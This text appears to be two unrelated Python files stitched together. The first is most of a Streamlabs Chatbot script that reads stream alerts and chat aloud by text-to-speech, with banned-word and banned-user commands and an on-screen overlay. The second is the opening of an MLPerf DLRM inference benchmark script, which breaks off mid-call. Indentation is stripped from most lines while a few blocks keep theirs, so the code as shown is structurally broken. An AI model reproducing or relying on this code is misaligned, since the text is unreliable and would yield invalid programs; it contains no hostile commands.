self.TTSOverlayFontSize = 32
self.TTSOverlayFont = ""
self.TTSOverlayUseBackground = True
self.TTSOverlayBackgroundColor = "rgba(0,0,0,1.0)"
self.TTSOverlayUseBorder = True
self.TTSOverlayBorderColor = "rgba(255,255,255,1.0)"
self.TTSOverlayHorizontalAlign = "center"
self.TTSOverlayVerticalAlign = "center"
self.TTSOverlayAnimateIn = 'fadeIn'
self.TTSOverlayAnimateOut = 'fadeOut'
self.MixerOnFollow = False
self.MixerFollowDelay = 0
self.MixerFollowMessage = "{name} has followed."
self.MixerOnHost = False
self.MixerHostMinimum = 0
self.MixerHostDelay = 0
self.MixerHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.MixerOnSub = False
self.MixerIncludeSubMessage = True
self.MixerSubDelay = 0
self.MixerSubMessage = "{name} has subscribed ({tier})."
self.MixerResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.StreamlabsOnDonation = False
self.StreamlabsIncludeDonationMessage = True
self.StreamlabsDonationMinimum = 1
self.StreamlabsDonationDelay = 0
self.StreamlabsDonationMessage = "{name} donated {amount}."
self.TwitchOnCheer = False
self.TwitchIncludeCheerMessage = True
self.TwitchCheerMinimum = 100
self.TwitchCheerDelay = 0
self.TwitchCheerMessage = "{name} has used {amount} bit{isPlural}."
self.TwitchOnFollow = False
self.TwitchFollowDelay = 0
self.TwitchFollowMessage = "{name} has followed."
self.TwitchOnHost = False
self.TwitchHostMinimum = 0
self.TwitchHostDelay = 0
self.TwitchHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.TwitchOnRaid = False
self.TwitchRaidMinimum = 0
self.TwitchRaidDelay = 0
self.TwitchRaidMessage = "{name} has raided you with a party of {amount}."
self.TwitchOnSub = False
self.TwitchIncludeSubMessage = True
self.TwitchSubDelay = 0
self.TwitchSubMessage = "{name} has subscribed ({tier})."
self.TwitchResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.TwitchGiftMessage = "{gifter} has gifted a sub ({tier}) to {name} ({months} month{isPlural})."
self.TwitchGiftMassMessage = "{gifter} has gifted {amount} subs to the channel: {recipients}."
self.YoutubeOnFollow = False
self.YoutubeFollowDelay = 0
self.YoutubeFollowMessage = "{name} has followed."
self.YoutubeOnSub = False
self.YoutubeIncludeSubMessage = True
self.YoutubeSubDelay = 0
self.YoutubeSubMessage = "{name} has subscribed ({tier})."
self.YoutubeResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.YoutubeOnSuperchat = False
self.YoutubeIncludeSuperchatMessage = True
self.YoutubeSuperchatMinimum = 5
self.YoutubeSuperchatDelay = 0
self.YoutubeSuperchatMessage = "{name} donated {amount}."
self.BanUserCommand = "!banuser"
self.BanUserCommandPermission = "Caster"
self.BanUserCommandPermissionInfo = ""
self.BanUserAddResponse = "The user was banned from using TTS."
            self.BanUserRemoveResponse = "The user is now able to use TTS."
self.BanWordCommand = "!banword"
self.BanWordCommandPermission = "Caster"
self.BanWordCommandPermissionInfo = ""
self.BanWordAddResponse = "The word was added to the banned words list."
self.BanWordRemoveResponse = "The word was removed from the banned words list."
self.BannedAction = "Skip Messages with Banned Words"
self.BannedActionBoolean = True
self.BannedMatchWholeWord = True
self.BannedReplacement = ""
self.SocketToken = None
def Reload(self, jsondata):
""" Reload settings from Streamlabs user interface by given json data. """
self.__dict__ = json.loads(jsondata, encoding="utf-8")
def Save(self, settingsfile):
""" Save settings contained within to .json and .js settings files. """
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
with codecs.open(settingsfile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8', ensure_ascii=False)))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
class UIConfig(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, uiconfigfile=None):
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8", object_pairs_hook=OrderedDict)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to read UIConfig file: " + str(sys.exc_info()[1]))
def Save(self, uiconfigfile):
""" Save UI Config contained within to .json file. """
if len(self.__dict__) > 0:
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to save ui config to file.")
#---------------------------------------
# Event Receiver Functions
#---------------------------------------
def EventReceiverConnected(sender, args):
Parent.Log(ScriptName, "Connected")
return
def EventReceiverDisconnected(sender, args):
Parent.Log(ScriptName, "Disconnected")
def EventReceiverEvent(sender, args):
handleEvent(sender,args)
def handleEvent(sender, args):
    # Grab all the data from the event
evntdata = args.Data
# Check if it contains data and for what streaming service it is
if evntdata and evntdata.For == "twitch_account":
if evntdata.Type == "follow" and ScriptSettings.TwitchOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.TwitchFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchFollowDelay)
elif evntdata.Type == "bits" and ScriptSettings.TwitchOnCheer:
s = ''
for message in evntdata.Message:
if message.Amount >= ScriptSettings.TwitchCheerMinimum:
if message.Amount > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchCheerMessage.format(name=message.Name, amount=message.Amount, isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchCheerDelay, ScriptSettings.TwitchIncludeCheerMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.TwitchOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.TwitchHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchHostDelay)
elif evntdata.Type == "raid" and ScriptSettings.TwitchOnRaid:
for message in evntdata.Message:
if int(message.Raiders) >= ScriptSettings.TwitchRaidMinimum:
ttsMessage = ScriptSettings.TwitchRaidMessage.format(name=message.Name, amount=str(message.Raiders))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchRaidDelay)
elif evntdata.Type == "subscription" and ScriptSettings.TwitchOnSub:
try:
s = ''
if len(evntdata.Message) > 1 and evntdata.Message[0].Gifter:
names = []
for message in evntdata.Message:
names.append(message.Name)
giftees = ', '.join(names)
ttsMessage = ScriptSettings.TwitchGiftMassMessage.format(recipients=giftees, gifter=message.Gifter, amount=len(names))
else:
for message in evntdata.Message:
tier = SubPlanMap[str(message.SubPlan)]
ttsMessage = ''
if message.Gifter:
if message.Months > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchGiftMessage.format(name=message.Name, gifter=message.Gifter, tier=tier, months=message.Months, isPlural=s)
else:
if message.Months == 1:
ttsMessage = ScriptSettings.TwitchSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.TwitchResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchSubDelay, ScriptSettings.TwitchIncludeSubMessage, message.Message, message.Name)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'Failed to process subscription. Please see logs (i).')
Parent.Log(ScriptName, str(e.args))
elif evntdata and evntdata.For == "mixer_account":
if evntdata.Type == "follow" and ScriptSettings.MixerOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.MixerFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.MixerOnSub:
for message in evntdata.Message:
                ttsMessage = ''
                # Derive the tier defensively; assumes the event message may expose a SubPlan
                # field like the Twitch events do (falls back to the raw value or an empty string).
                sub_plan = str(getattr(message, 'SubPlan', ''))
                tier = SubPlanMap.get(sub_plan, sub_plan)
                if message.Months == 1:
                    ttsMessage = ScriptSettings.MixerSubMessage.format(name=message.Name, tier=tier, months=message.Months)
                else:
                    ttsMessage = ScriptSettings.MixerResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerSubDelay, ScriptSettings.MixerIncludeSubMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.MixerOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.MixerHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.MixerHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerHostDelay)
elif evntdata and evntdata.For == "streamlabs":
if evntdata.Type == "donation" and ScriptSettings.StreamlabsOnDonation:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.StreamlabsDonationMinimum:
ttsMessage = ScriptSettings.StreamlabsDonationMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.StreamlabsDonationDelay, ScriptSettings.StreamlabsIncludeDonationMessage, message.Message, message.Name)
elif evntdata and evntdata.For == "youtube_account":
if evntdata.Type == "follow" and ScriptSettings.YoutubeOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.YoutubeFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.YoutubeOnSub:
for message in evntdata.Message:
            ttsMessage = ''
            # As with the Mixer branch: assume the message may carry a SubPlan-like field;
            # fall back to the raw value or an empty string.
            sub_plan = str(getattr(message, 'SubPlan', ''))
            tier = SubPlanMap.get(sub_plan, sub_plan)
            if message.Months == 1:
                ttsMessage = ScriptSettings.YoutubeSubMessage.format(name=message.Name, tier=tier, months=message.Months)
            else:
                ttsMessage = ScriptSettings.YoutubeResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSubDelay)
elif evntdata.Type == "superchat" and ScriptSettings.YoutubeOnSuperchat:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.YoutubeSuperchatMinimum:
ttsMessage = ScriptSettings.YoutubeSuperchatMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSuperchatDelay, ScriptSettings.YoutubeIncludeSuperchatMessage, message.Message, message.Name)
#---------------------------------------
# Script Functions
#---------------------------------------
def updateUIConfig():
voices = []
for voice in spk.GetInstalledVoices():
info = voice.VoiceInfo
voices.append(info.Name)
UIConfigs = UIConfig(UIConfigFile)
UIConfigs.VoiceName['items'] = voices
if ScriptSettings.VoiceName not in voices:
ScriptSettings.VoiceName = ''
ScriptSettings.Save(SettingsFile)
UIConfigs.Save(UIConfigFile)
def updateBannedSettings():
    global ScriptSettings, reBanned, bannedWords, bannedUsers
    ScriptSettings.BannedActionBoolean = bool(ScriptSettings.BannedAction == 'Skip Messages with Banned Words')
    # Guard against an empty banned-word list: an empty alternation would otherwise match every message.
    words = [word for word in bannedWords if word]
    if not words:
        reBanned = re.compile(r"(?!x)x")  # a pattern that can never match
    elif ScriptSettings.BannedMatchWholeWord:
        reBanned = re.compile(r"\b({0})\b".format('|'.join(words)), re.IGNORECASE)
    else:
        reBanned = re.compile(r"({0})".format('|'.join(words)), re.IGNORECASE)
def SendOverlayUpdate(message):
""" Send updated information to the overlay. """
message = message.encode('utf8', 'replace')
payload = {
'message': message,
'time': ScriptSettings.TTSOverlayTime,
'fontColor': ScriptSettings.TTSOverlayFontColor,
'useOutline': ScriptSettings.TTSOverlayUseFontOutline,
'fontOutline': ScriptSettings.TTSOverlayFontOutline,
'useShadow': ScriptSettings.TTSOverlayUseFontShadow,
'fontShadow': ScriptSettings.TTSOverlayFontShadow,
'fontSize': ScriptSettings.TTSOverlayFontSize,
'font': ScriptSettings.TTSOverlayFont,
'useBackground': ScriptSettings.TTSOverlayUseBackground,
'background': ScriptSettings.TTSOverlayBackgroundColor,
'useBorder': ScriptSettings.TTSOverlayUseBorder,
'border': ScriptSettings.TTSOverlayBorderColor,
'horizontalAlign': ScriptSettings.TTSOverlayHorizontalAlign,
'verticalAlign': ScriptSettings.TTSOverlayVerticalAlign,
'animateIn': ScriptSettings.TTSOverlayAnimateIn,
'animateOut': ScriptSettings.TTSOverlayAnimateOut,
}
Parent.BroadcastWsEvent("EVENT_TTS_AC_OVERLAY", json.dumps(payload))
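# The bundled overlay page (see the "overlay" folder opened by OpenOverlayFolder below) is
# presumably the consumer of the "EVENT_TTS_AC_OVERLAY" websocket event broadcast above.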
def SendTTSMessage(voice, message, isAlert, user = '', text = '', displayName = ''):
if user and user in bannedUsers:
return
if user and not text:
text = message
if not isAlert and user and ScriptSettings.MaxCharacters != 0 and len(message) > ScriptSettings.MaxCharacters:
Parent.SendStreamMessage(ScriptSettings.MaxCharacterMessage.format(user=displayName))
return
if ScriptSettings.BannedActionBoolean:
if bool(reBanned.search(message)):
return
else:
message = reBanned.sub(ScriptSettings.BannedReplacement, message)
text = reBanned.sub(ScriptSettings.BannedReplacement, text)
displayName = reBanned.sub(ScriptSettings.BannedReplacement, displayName)
try:
if (isAlert and not ScriptSettings.TTSOverlayExcludeAlerts) or (not isAlert and not user):
SendOverlayUpdate(message)
elif not isAlert:
SendOverlayUpdate(ScriptSettings.TTSOverlayMessage.format(user=displayName, message=text))
voice.Speak(message)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'TTS Failed, please see the script logs (i).')
Parent.Log(ScriptName, str(e.args))
def SendTTSMessagesWithDelay(message, delay, includeExtra = False, extraMessage = '', user = ''):
if delay > 0:
time.sleep(delay)
global spk
SendTTSMessage(spk, message, True)
if includeExtra:
SendTTSMessage(spk, extraMessage, False, user)
def readFileArray(fileToRead):
lines = []
with open(fileToRead) as f:
lines = f.readlines()
lines = [x.strip().decode("utf-8", "replace") for x in lines]
return lines
def writeArrayToFile(arrayToWrite, fileToWrite):
with open(fileToWrite, 'w') as f:
f.write('\n'.join(arrayToWrite).encode('utf8', 'replace'))
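# Note: users.txt and banned.txt are plain UTF-8 text files with one entry per line;
# the two helpers above simply round-trip that format.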
def handleBanUser(data, user):
global bannedUsers
if user in bannedUsers:
bannedUsers.remove(user)
Parent.SendStreamMessage(ScriptSettings.BanUserRemoveResponse.format(user=data.UserName, banned=user))
else:
bannedUsers.append(user)
Parent.SendStreamMessage(ScriptSettings.BanUserAddResponse.format(user=data.UserName, banned=user))
writeArrayToFile(bannedUsers, BannedUserFile)
#---------------------------------------
# Chatbot Initialize Function
#---------------------------------------
def Init():
# Load settings from file and verify
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
global spk
spk = SpeechSynthesizer()
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
updateUIConfig()
global bannedWords, bannedUsers
bannedUsers = readFileArray(BannedUserFile)
bannedWords = readFileArray(BannedWordFile)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
spk.SelectVoice(ScriptSettings.VoiceName)
# Init the Streamlabs Event Receiver
global EventReceiver
EventReceiver = StreamlabsEventClient()
EventReceiver.StreamlabsSocketConnected += EventReceiverConnected
EventReceiver.StreamlabsSocketDisconnected += EventReceiverDisconnected
EventReceiver.StreamlabsSocketEvent += EventReceiverEvent
# Auto Connect if key is given in settings
if ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
# End of Init
return
#---------------------------------------
# Chatbot Save Settings Function
#---------------------------------------
def ReloadSettings(jsondata):
# Reload newly saved settings and verify
ScriptSettings.Reload(jsondata)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
global spk
spk.SelectVoice(ScriptSettings.VoiceName)
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
global EventReceiver
if not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
elif EventReceiver.IsConnected and not ScriptSettings.SocketToken:
EventReceiver.Disconnect()
# End of ReloadSettings
return
#---------------------------------------
# Chatbot Script Unload Function
#---------------------------------------
def Unload():
global EventReceiver
if EventReceiver.IsConnected:
EventReceiver.Disconnect()
EventReceiver = None
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
global EventReceiver
if not state and EventReceiver.IsConnected:
EventReceiver.Disconnect()
elif state and not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
return
#---------------------------------------
# Chatbot Execute Function
#---------------------------------------
def Execute(data):
if data.IsChatMessage():
command = data.GetParam(0)
if command == ScriptSettings.TTSCommand and IsFromValidSource(data, ScriptSettings.TTSCommandUsage, ScriptSettings.TTSCommandUsageReply, ScriptSettings.TTSCommandUsageReplyMessage):
if HasPermission(data, ScriptSettings.TTSCommandPermission, ScriptSettings.TTSCommandPermissionInfo):
if not IsOnCooldown(data, ScriptSettings.TTSCommand, ScriptSettings.TTSCasterCD, ScriptSettings.TTSUseCD, ScriptSettings.TTSOnCooldown, ScriptSettings.TTSOnUserCooldown):
if HasCurrency(data, ScriptSettings.TTSCommandCost):
commandOffset = len(ScriptSettings.TTSCommand) + 1
text = data.Message[commandOffset:]
message = ScriptSettings.TTSCommandMessage.format(user=data.UserName, message=text)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), text, data.UserName))
messageThread.daemon = True
messageThread.start()
Parent.AddUserCooldown(ScriptName, ScriptSettings.TTSCommand, data.User, ScriptSettings.TTSUserCooldown)
Parent.AddCooldown(ScriptName, ScriptSettings.TTSCommand, ScriptSettings.TTSCooldown)
elif command == ScriptSettings.BanWordCommand and HasPermission(data, ScriptSettings.BanWordCommandPermission, ScriptSettings.BanWordCommandPermissionInfo) and data.GetParamCount() > 1:
message = data.GetParam(1)
i = 2
while i < data.GetParamCount():
message = message + ' ' + data.GetParam(i)
i = i + 1
if message:
global bannedWords
                if message in bannedWords:
                    bannedWords.remove(message)
                    Parent.SendStreamMessage(ScriptSettings.BanWordRemoveResponse.format(user=data.UserName, word=message))
                else:
                    bannedWords.append(message)
                    Parent.SendStreamMessage(ScriptSettings.BanWordAddResponse.format(user=data.UserName, word=message))
writeArrayToFile(bannedWords, BannedWordFile)
updateBannedSettings()
elif command == ScriptSettings.BanUserCommand and HasPermission(data, ScriptSettings.BanUserCommandPermission, ScriptSettings.BanUserCommandPermissionInfo) and data.GetParamCount() > 1:
user = data.GetParam(1).lower()
if user:
handleBanUser(data, user)
if data.GetParamCount() > 2:
                    duration = data.GetParam(2)  # avoid shadowing the imported time module
                    if duration.isdigit():
                        banThread = threading.Timer(int(duration), handleBanUser, args=(data, user))
banThread.daemon = True
banThread.start()
if ScriptSettings.TTSAllChat and IsFromValidSource(data, ScriptSettings.TTSAllChatUsage, ScriptSettings.TTSAllChatUsageReply, ScriptSettings.TTSAllChatUsageReplyMessage):
if not ScriptSettings.TTSAllChatExcludeCommands or command[0] != '!':
message = ScriptSettings.TTSAllChatMessage.format(user=data.UserName, message=data.Message)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), data.Message, data.UserName))
messageThread.daemon = True
messageThread.start()
# End of execute
return
#---------------------------------------
# Chatbot Execute Helper Functions
#---------------------------------------
def SendResp(data, Message):
"""Sends message to Stream or discord chat depending on settings"""
if not data.IsFromDiscord() and not data.IsWhisper():
Parent.SendStreamMessage(Message)
if not data.IsFromDiscord() and data.IsWhisper():
Parent.SendStreamWhisper(data.User, Message)
if data.IsFromDiscord() and not data.IsWhisper():
Parent.SendDiscordMessage(Message)
if data.IsFromDiscord() and data.IsWhisper():
Parent.SendDiscordDM(data.User, Message)
def IsFromValidSource(data, Usage, SendResponse, UsageResponse):
"""Return true or false depending on the message is sent from
a source that's in the usage setting or not"""
usedDiscord = data.IsFromDiscord()
usedWhisper = data.IsWhisper()
if not usedDiscord:
l = ["Stream Chat", "Chat Both", "All", "Stream Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Stream Whisper", "Whisper Both", "All", "Stream Both"]
if usedWhisper and (Usage in l):
return True
if usedDiscord:
l = ["Discord Chat", "Chat Both", "All", "Discord Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Discord Whisper", "Whisper Both", "All", "Discord Both"]
if usedWhisper and (Usage in l):
return True
if SendResponse:
message = UsageResponse.format(user=data.UserName, usage=Usage)
SendResp(data, message)
return False
def HasPermission(data, permission, permissionInfo):
"""Returns true if user has permission and false if user doesn't"""
if not Parent.HasPermission(data.User, permission, permissionInfo):
return False
return True
def IsOnCooldown(data, command, casterCD, useCD, cooldownMessage, userCooldownMessage):
"""Return true if command is on cooldown and send cooldown message if enabled"""
#introduce globals for cooldown management
cooldown = Parent.IsOnCooldown(ScriptName, command)
userCooldown = Parent.IsOnUserCooldown(ScriptName, command, data.User)
caster = (Parent.HasPermission(data.User, "Caster", "") and casterCD)
#check if command is on cooldown
if (cooldown or userCooldown) and caster is False:
#check if cooldown message is enabled
if useCD:
#set variables for cooldown
cooldownDuration = Parent.GetCooldownDuration(ScriptName, command)
userCDD = Parent.GetUserCooldownDuration(ScriptName, command, data.User)
#check for the longest CD!
if cooldownDuration > userCDD:
#set cd remaining
m_CooldownRemaining = cooldownDuration
#send cooldown message
message = cooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
else: #set cd remaining
m_CooldownRemaining = userCDD
#send usercooldown message
message = userCooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
return True
return False
def HasCurrency(data, cost):
if (cost == 0) or (Parent.RemovePoints(data.User, data.UserName, cost)):
return True
return False
#---------------------------------------
# Chatbot Tick Function
#---------------------------------------
def Tick():
# End of Tick
return
#---------------------------------------
# Chatbot Parameter Parser
#---------------------------------------
def Parse(parseString, user, target, message):
result = RegTTS.search(parseString)
if result:
paramMessage = result.group(0)
ttsMessage = result.group("message")
parseString = parseString.replace(paramMessage, "")
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, ttsMessage, False))
messageThread.daemon = True
messageThread.start()
# Return unaltered parseString
return parseString
#---------------------------------------
# Chatbot Button Function
#---------------------------------------
def OpenOverlayFolder():
"""Open the overlay folder in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "overlay"))
def OpenReadMe():
"""Open the README.txt in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "README.txt"))
def OpenBannedWordFile():
"""Open the banned.txt in the scripts folder"""
os.startfile(BannedWordFile)
def OpenBannedUserFile():
"""Open the users.txt in the scripts folder"""
os.startfile(BannedUserFile)
def OpenAnimateDemo():
"""Open Animation Demo Website"""
OpenLink("https://daneden.github.io/animate.css/")
def OpenSocketToken():
"""Open Streamlabs API Settings"""
OpenLink("https://streamlabs.com/dashboard#/settings/api-settings")
def OpenGithubRepository():
"""Open the GitHub Repository for this script"""
OpenLink("https://github.com/kruiser8/TTS-Alerts-And-Chat")
def OpenTwitter():
"""Open the Twitter of the author"""
OpenLink("https://twitter.com/kruiser8")
def OpenLink(link):
"""Open links through buttons in UI"""
os.system("explorer " + link)
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import criteo
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"kaggle":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
"terabyte":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
}
# pre-defined command line options to simplify things. They are used as defaults and can be
# overridden from the command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-pytorch": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-pytorch": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-onnxruntime": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-onnxruntime": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 2048,
},
}
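# Example of how the profiles above combine (see get_args below): "defaults" is applied first,
# an explicit --profile overlays it, and any flag passed on the command line wins over both.
# So "--profile dlrm-kaggle-pytorch --max-batchsize 64" ends up with dataset=kaggle,
# backend=pytorch-native and max_batchsize=64.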
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
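# The --scenario name is mapped to the LoadGen TestScenario enum here; in main() below,
# SingleStream runs queries inline via RunnerBase while the other scenarios go through the
# threaded QueueRunner (see runner_map).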
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--model", help="name of the mlperf model, ie. dlrm")
parser.add_argument("--model-path", required=True, help="path to the model file")
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--test-num-workers", type=int, default=0, help='# of workers reading the data')
parser.add_argument("--max-ind-range", type=int, default=-1)
parser.add_argument("--data-sub-sample-rate", type=float, default=0.0)
parser.add_argument("--mlperf-bin-loader", action='store_true', default=False)
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs (currently not used)")
parser.add_argument("--outputs", help="model outputs (currently not used)")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--cache", type=int, default=0, help="use cache (currently not used)")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--duration", type=int, help="duration in milliseconds (ms)")
parser.add_argument("--target-qps", type=int, help="target/expected qps")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--count-samples", type=int, help="dataset items to use")
parser.add_argument("--count-queries", type=int, help="number of queries to use")
parser.add_argument("--samples-per-query-multistream", type=int, help="query length for multi-stream scenario (in terms of aggregated samples)")
# --samples-per-query-offline is equivalent to perf_sample_count
parser.add_argument("--samples-per-query-offline", type=int, default=2048, help="query length for offline scenario (in terms of aggregated samples)")
parser.add_argument("--samples-to-aggregate-fix", type=int, help="number of samples to be treated as one")
parser.add_argument("--samples-to-aggregate-min", type=int, help="min number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-max", type=int, help="max number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-quantile-file", type=str, help="distribution quantile used to generate number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-trace-file", type=str, default="dlrm_trace_of_aggregated_samples.txt")
parser.add_argument("--numpy-rand-seed", type=int, default=123)
args = parser.parse_args()
# set random seed
np.random.seed(args.numpy_rand_seed)
    # don't use defaults in argparse. Instead we default to a dict, override that with a profile
    # and use that as the default unless the command line gives a value
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend, dataset, max_ind_range, data_sub_sample_rate, use_gpu):
if backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendPytorchNative(
m_spa=16,
